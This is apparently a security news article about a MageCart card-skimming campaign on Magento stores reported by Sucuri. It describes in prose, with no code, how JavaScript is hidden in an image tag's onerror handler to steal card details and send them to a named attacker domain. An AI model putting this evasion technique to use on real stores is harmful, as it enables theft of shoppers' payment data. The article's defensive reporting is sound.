Cybersecurity researchers from Sucuri have uncovered a new data-stealing campaign targeting online stores running on the Magento platform. Attackers are embedding malicious code within HTML markup, disguising it as image tags to evade detection.
MageCart: The Ongoing Threat to Online Transactions
MageCart is a well-known group of malware strains designed to steal payment data from online platforms. Cybercriminals behind these attacks use a variety of hacking techniques, both on the client side and the server side, to inject hidden skimmers into payment pages. The malicious code is often triggered at the checkout stage, either by replacing the legitimate payment form or by intercepting user-inputted data in real-time.
The name “MageCart” originates from the initial focus of these attacks—the Magento e-commerce platform, which facilitates shopping cart and payment functionality. Over time, however, attackers have refined their methods, concealing their malicious scripts within fake images, audio files, icons, and even 404 error pages.
A New Level of Stealth: Exploiting the <img> Tag
This latest attack is particularly deceptive because it embeds the malicious code inside an <img> tag on an HTML page. Security researchers point out that this method helps bypass detection by security systems. Since image tags often contain long strings of encoded data, such as file paths or base64-encoded images, the presence of hidden code doesn’t immediately raise suspicion.
The key trick lies in the use of the onerror event. Normally, browsers utilize this event to handle situations where an image fails to load. However, in this case, attackers exploit it to execute JavaScript code instead. This allows the injected script to blend seamlessly into the page while appearing as a standard error-handling mechanism.
Once activated, the malicious code detects whether a payment page is open. As soon as a user clicks the payment confirmation button, the script captures the credit card details—including the card number, expiration date, and CVV code—and transmits them to a remote server. In this campaign, stolen data is sent to a domain named wellfacing[.]com, making it accessible to the attackers.
Why This Attack is So Dangerous
Security experts emphasize that this attack is not only well-hidden but also highly effective. Cybercriminals achieve two key objectives:
- Evading Security Scanners – By embedding the skimming script within seemingly harmless image tags, attackers successfully bypass many security detection mechanisms.
- Avoiding User Suspicion – Since the fake payment form closely mimics the real one, most users are unlikely to notice that their data is being stolen.
Evolving Threats to E-Commerce Platforms
Attacks against platforms such as Magento, WooCommerce, and PrestaShop continue to evolve, becoming increasingly sophisticated. Malicious scripts are often encrypted and leverage unconventional obfuscation techniques, making detection even more challenging. These emerging threats highlight the growing ingenuity of cybercriminals and reinforce the need for constant security monitoring and vigilance in the e-commerce space.
To protect online stores and customers, website owners should implement robust security measures, regularly audit their systems, and stay informed about the latest cybersecurity threats.
